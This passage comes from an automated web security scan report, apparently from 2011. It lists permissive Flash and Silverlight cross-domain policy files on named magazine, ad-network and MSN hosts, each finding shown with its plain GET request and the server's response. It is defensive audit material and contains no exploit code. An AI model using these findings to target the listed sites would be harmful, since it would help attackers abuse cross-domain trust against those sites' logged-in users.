   <allow-access-from domain="*.hearstmags.com"/>
   <allow-access-from domain="*.realage.com"/>
   <allow-access-from domain="*.realbeauty.com"/>
<allow-access-from domain="*.mstudio.com"/>
   <allow-access-from domain="*.cooliris.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.thesurvivorsclub.org" secure="false" />
...[SNIP]...
<allow-access-from domain="*.googlesyndication.com" />
   <allow-access-from domain="*.doubleclick.net"/>
   <allow-access-from domain="*.harpersbazaar.co.uk"/>
   <allow-access-from domain="*.company.co.uk"/>
   <allow-access-from domain="*.youandyourwedding.co.uk"/>
   <allow-access-from domain="*.menshealth.co.uk"/>
   <allow-access-from domain="*.babyexpert.com"/>
   <allow-access-from domain="*.handbag.com"/>
   <allow-access-from domain="*.cosmopolitan.co.uk"/>
...[SNIP]...
5.147. http://www.realage.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.realage.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.realage.com

Response

HTTP/1.0 200 OK
Server: Apache
Content-Length: 2016
Content-Type: application/xml
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: max-age=14
Date: Sat, 17 Sep 2011 16:30:09 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.syrupnyc.org"/>
   <allow-access-from domain="*.esquire.com"/>
   <allow-access-from domain="*.cosmogirl.com"/>
   <allow-access-from domain="*.cosmopolitan.com"/>
   <allow-access-from domain="*.countryliving.com"/>
   <allow-access-from domain="*.goodhousekeeping.com"/>
   <allow-access-from domain="*.harpersbazaar.com"/>
   <allow-access-from domain="*.housebeautiful.com"/>
   <allow-access-from domain="*.marieclaire.com"/>
   <allow-access-from domain="*.misquincemag.com"/>
   <allow-access-from domain="*.popularmechanics.com"/>
   <allow-access-from domain="*.quickandsimple.com"/>
   <allow-access-from domain="*.redbookmag.com"/>
   <allow-access-from domain="*.seventeen.com"/>
   <allow-access-from domain="*.teenmag.com"/>
   <allow-access-from domain="*.thedailygreen.com"/>
   <allow-access-from domain="*.veranda.com"/>
   <allow-access-from domain="*.townandcountrymag.com"/>
   <allow-access-from domain="*.townandcountrytravelmag.com"/>
   <allow-access-from domain="*.brightcove.com"/>
   <allow-access-from domain="*.hearstmags.com"/>
   <allow-access-from domain="*.realage.com"/>
   <allow-access-from domain="*.realbeauty.com"/>
<allow-access-from domain="*.mstudio.com"/>
   <allow-access-from domain="*.cooliris.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.thesurvivorsclub.org" secure="false" />
...[SNIP]...
<allow-access-from domain="*.googlesyndication.com" />
   <allow-access-from domain="*.doubleclick.net"/>
   <allow-access-from domain="*.harpersbazaar.co.uk"/>
   <allow-access-from domain="*.company.co.uk"/>
   <allow-access-from domain="*.youandyourwedding.co.uk"/>
   <allow-access-from domain="*.menshealth.co.uk"/>
   <allow-access-from domain="*.babyexpert.com"/>
   <allow-access-from domain="*.handbag.com"/>
   <allow-access-from domain="*.cosmopolitan.co.uk"/>
...[SNIP]...
5.148. http://www.seventeen.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.seventeen.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.seventeen.com

Response

HTTP/1.0 200 OK
Server: Apache
Content-Length: 2016
Content-Type: application/xml
Cache-Control: max-age=272
Date: Sat, 17 Sep 2011 16:34:01 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.syrupnyc.org"/>
   <allow-access-from domain="*.esquire.com"/>
   <allow-access-from domain="*.cosmogirl.com"/>
   <allow-access-from domain="*.cosmopolitan.com"/>
   <allow-access-from domain="*.countryliving.com"/>
   <allow-access-from domain="*.goodhousekeeping.com"/>
   <allow-access-from domain="*.harpersbazaar.com"/>
   <allow-access-from domain="*.housebeautiful.com"/>
   <allow-access-from domain="*.marieclaire.com"/>
   <allow-access-from domain="*.misquincemag.com"/>
   <allow-access-from domain="*.popularmechanics.com"/>
   <allow-access-from domain="*.quickandsimple.com"/>
   <allow-access-from domain="*.redbookmag.com"/>
   <allow-access-from domain="*.seventeen.com"/>
   <allow-access-from domain="*.teenmag.com"/>
   <allow-access-from domain="*.thedailygreen.com"/>
   <allow-access-from domain="*.veranda.com"/>
   <allow-access-from domain="*.townandcountrymag.com"/>
   <allow-access-from domain="*.townandcountrytravelmag.com"/>
   <allow-access-from domain="*.brightcove.com"/>
   <allow-access-from domain="*.hearstmags.com"/>
   <allow-access-from domain="*.realage.com"/>
   <allow-access-from domain="*.realbeauty.com"/>
<allow-access-from domain="*.mstudio.com"/>
   <allow-access-from domain="*.cooliris.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.thesurvivorsclub.org" secure="false" />
...[SNIP]...
<allow-access-from domain="*.googlesyndication.com" />
   <allow-access-from domain="*.doubleclick.net"/>
   <allow-access-from domain="*.harpersbazaar.co.uk"/>
   <allow-access-from domain="*.company.co.uk"/>
   <allow-access-from domain="*.youandyourwedding.co.uk"/>
   <allow-access-from domain="*.menshealth.co.uk"/>
   <allow-access-from domain="*.babyexpert.com"/>
   <allow-access-from domain="*.handbag.com"/>
   <allow-access-from domain="*.cosmopolitan.co.uk"/>
...[SNIP]...
5.149. http://www.thedailygreen.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.thedailygreen.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.thedailygreen.com

Response

HTTP/1.0 200 OK
Server: Apache
Content-Length: 2016
Content-Type: application/xml
Cache-Control: max-age=600
Date: Sat, 17 Sep 2011 16:26:50 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.syrupnyc.org"/>
   <allow-access-from domain="*.esquire.com"/>
   <allow-access-from domain="*.cosmogirl.com"/>
   <allow-access-from domain="*.cosmopolitan.com"/>
   <allow-access-from domain="*.countryliving.com"/>
   <allow-access-from domain="*.goodhousekeeping.com"/>
   <allow-access-from domain="*.harpersbazaar.com"/>
   <allow-access-from domain="*.housebeautiful.com"/>
   <allow-access-from domain="*.marieclaire.com"/>
   <allow-access-from domain="*.misquincemag.com"/>
   <allow-access-from domain="*.popularmechanics.com"/>
   <allow-access-from domain="*.quickandsimple.com"/>
   <allow-access-from domain="*.redbookmag.com"/>
   <allow-access-from domain="*.seventeen.com"/>
   <allow-access-from domain="*.teenmag.com"/>
   <allow-access-from domain="*.thedailygreen.com"/>
   <allow-access-from domain="*.veranda.com"/>
   <allow-access-from domain="*.townandcountrymag.com"/>
   <allow-access-from domain="*.townandcountrytravelmag.com"/>
   <allow-access-from domain="*.brightcove.com"/>
   <allow-access-from domain="*.hearstmags.com"/>
   <allow-access-from domain="*.realage.com"/>
   <allow-access-from domain="*.realbeauty.com"/>
<allow-access-from domain="*.mstudio.com"/>
   <allow-access-from domain="*.cooliris.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.thesurvivorsclub.org" secure="false" />
...[SNIP]...
<allow-access-from domain="*.googlesyndication.com" />
   <allow-access-from domain="*.doubleclick.net"/>
   <allow-access-from domain="*.harpersbazaar.co.uk"/>
   <allow-access-from domain="*.company.co.uk"/>
   <allow-access-from domain="*.youandyourwedding.co.uk"/>
   <allow-access-from domain="*.menshealth.co.uk"/>
   <allow-access-from domain="*.babyexpert.com"/>
   <allow-access-from domain="*.handbag.com"/>
   <allow-access-from domain="*.cosmopolitan.co.uk"/>
...[SNIP]...
5.150. http://www.ugo.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ugo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ugo.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:28:01 GMT
Server: Apache
Set-Cookie: cgi-session-id=02E0B838-E14A-11E0-8EEE-91FC2AB523E0; path=/
Set-Cookie: cgi-session-id=02E0B838-E14A-11E0-8EEE-91FC2AB523E0; path=/
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.ugo.com" />
<allow-access-from domain="ugo.com" />
<allow-access-from domain="flashxml.ugo.com" />
<allow-access-from domain="*.ugo.com" />
<allow-access-from domain="*.ugo.dev" />
<allow-access-from domain="e3.ugo.com" />
<allow-access-from domain="e3.net" />
<allow-access-from domain="*.ign.com" />
<allow-access-from domain="*.askmen.com" />
<allow-access-from domain="*.1up.com" />
...[SNIP]...
5.151. http://www.youtube-nocookie.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.youtube-nocookie.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.youtube-nocookie.com

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 16:44:57 GMT
Server: Apache
Last-Modified: Thu, 15 Sep 2011 00:40:20 GMT
ETag: "132-4acf01f0e4500"
Accept-Ranges: bytes
Content-Length: 306
Content-Type: application/xml

<?xml version="1.0"?>
<!-- http://www.youtube.com/crossdomain.xml -->
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="s.ytimg.com" />
...[SNIP]...
5.152. http://1663.ic-live.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://1663.ic-live.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: 1663.ic-live.com

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 16:37:27 GMT
Server: Apache
Last-Modified: Thu, 11 Aug 2011 17:51:35 GMT
ETag: "6b8443-1c8-4aa3e72a5b7c0"
Accept-Ranges: bytes
Content-Length: 456
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="/w3c/p3p.xml"
Content-Type: text/xml
X-Cache: MISS from i2a-coll-3
X-Cache-Lookup: MISS from i2a-coll-3:80
Via: 1.0 i2a-coll-3:80 (squid/2.6.STABLE21)
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master
...[SNIP]...
<allow-access-from domain="ecdev1.avery.com" secure="false" />
...[SNIP]...
<allow-access-from domain="ecdev1.averysignaturebinders.com" secure="false" />
...[SNIP]...
<allow-access-from domain="www.averysignaturebinders.com" secure="false" />
...[SNIP]...
5.153. http://api.twitter.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.twitter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.twitter.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:34:11 GMT
Server: hi
Status: 200 OK
Last-Modified: Wed, 14 Sep 2011 18:32:19 GMT
Content-Type: application/xml
Content-Length: 561
Cache-Control: max-age=1800
Expires: Sat, 17 Sep 2011 17:04:11 GMT
Vary: Accept-Encoding
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="twitter.com" />
...[SNIP]...
<allow-access-from domain="search.twitter.com" />
   <allow-access-from domain="static.twitter.com" />
...[SNIP]...
6. Silverlight cross-domain policy  previous  next
There are 38 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

6.1. http://33across.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://33across.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: 33across.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:44:36 GMT
Server: Apache
Last-Modified: Tue, 29 Mar 2011 17:37:20 GMT
Accept-Ranges: bytes
Content-Length: 335
Cache-Control: max-age=1209600, proxy-revalidate
Expires: Sat, 01 Oct 2011 16:44:36 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="SOAPAction">
<domain uri="*"/>
</allow-from>
<gr
...[SNIP]...
6.2. http://a.rad.msn.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.rad.msn.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: a.rad.msn.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: text/xml
Last-Modified: Fri, 22 Jul 2011 17:49:14 GMT
Accept-Ranges: bytes
ETag: "0c969ab9748cc1:0"
Server: Microsoft-IIS/7.5
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Access-Control-Allow-Origin: *
Date: Sat, 17 Sep 2011 16:27:58 GMT
Connection: keep-alive
Content-Length: 337

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<gran
...[SNIP]...
6.3. http://ad.doubleclick.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 20:54:04 GMT
Date: Sat, 17 Sep 2011 16:23:42 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...
6.4. http://adunit.cdn.auditude.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adunit.cdn.auditude.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: adunit.cdn.auditude.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=604800
Content-Type: text/xml
Date: Sat, 17 Sep 2011 16:23:16 GMT
ETag: "1210291592"
Expires: Sat, 24 Sep 2011 16:23:16 GMT
Last-Modified: Tue, 23 Aug 2011 20:50:56 GMT
Server: ECS (sjo/522D)
X-Cache: HIT
Content-Length: 349
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers= "*">
<domain uri="*"/>
</allow-from>


...[SNIP]...
6.5. http://b.rad.msn.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.rad.msn.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.rad.msn.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: text/xml
Last-Modified: Fri, 22 Jul 2011 17:49:14 GMT
Accept-Ranges: bytes
ETag: "0c969ab9748cc1:0"
Server: Microsoft-IIS/7.5
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Access-Control-Allow-Origin: *
Date: Sat, 17 Sep 2011 16:29:19 GMT
Connection: keep-alive
Content-Length: 337

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<gran
...[SNIP]...
6.6. http://b.scorecardresearch.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 07 Jul 2011 18:29:25 GMT
Content-Type: application/xml
Expires: Sun, 18 Sep 2011 16:23:09 GMT
Date: Sat, 17 Sep 2011 16:23:09 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...
6.7. http://c.delish.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.delish.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: c.delish.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, proxy-revalidate, no-store
Pragma: no-cache
Content-Type: text/xml
Last-Modified: Fri, 05 Nov 2010 19:44:56 GMT
Accept-Ranges: bytes
ETag: "0ac2dec217dcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 17 Sep 2011 16:21:11 GMT
Connection: keep-alive
Content-Length: 340

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<g
...[SNIP]...
6.8. http://c.msn.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.msn.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: c.msn.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, proxy-revalidate, no-store
Pragma: no-cache
Content-Type: text/xml
Last-Modified: Fri, 05 Nov 2010 18:44:56 GMT
Accept-Ranges: bytes
ETag: "044698a197dcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 17 Sep 2011 16:29:03 GMT
Connection: keep-alive
Content-Length: 340

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<g
...[SNIP]...
6.9. http://cdn.eyewonder.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.eyewonder.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: cdn.eyewonder.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=3600
Content-Type: text/xml
Last-Modified: Thu, 01 Apr 2010 03:56:43 GMT
Accept-Ranges: bytes
ETag: "a683d7574fd1ca1:1841"
Server: Microsoft-IIS/6.0
p3p: policyref="/100125/w3c/p3p.xml", CP="NOI DSP LAW NID PSA OUR IND NAV STA COM"
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 16:38:50 GMT
Content-Length: 268
Connection: close

<?xml version="1.0" encoding="utf-8"?><access-policy><cross-domain-access><policy><allow-from http-request-headers="*"><domain uri="http://*"/></allow-from><grant-to><resource path="/" include-subpath
...[SNIP]...
6.10. http://dc.kaboodle.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dc.kaboodle.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: dc.kaboodle.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:31:59 GMT
Server: Omniture DC/2.0.0
xserver: www357
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...
6.11. http://edge1.catalog.video.msn.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://edge1.catalog.video.msn.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: edge1.catalog.video.msn.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=1209600
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "bd4e6a41d40cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 433
Age: 759012
Date: Sat, 17 Sep 2011 16:30:01 GMT
Last-Modified: Mon, 11 Jul 2011 22:55:35 GMT
Expires: Thu, 22 Sep 2011 21:39:49 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>

...[SNIP]...
<domain uri="http://*"/>
...[SNIP]...
6.12. http://edge3.catalog.video.msn.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://edge3.catalog.video.msn.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: edge3.catalog.video.msn.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=1209600
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "bd4e6a41d40cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 433
Age: 763820
Date: Sat, 17 Sep 2011 16:30:22 GMT
Last-Modified: Mon, 11 Jul 2011 22:55:35 GMT
Expires: Thu, 22 Sep 2011 20:20:02 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>

...[SNIP]...
<domain uri="http://*"/>
...[SNIP]...
6.13. http://hearst.112.2o7.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hearst.112.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: hearst.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:23:06 GMT
Server: Omniture DC/2.0.0
xserver: www391
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...
6.14. http://hearstmagazines.112.2o7.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hearstmagazines.112.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: hearstmagazines.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:21:17 GMT
Server: Omniture DC/2.0.0
xserver: www416
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...
6.15. http://img.widgets.video.s-msn.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.widgets.video.s-msn.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
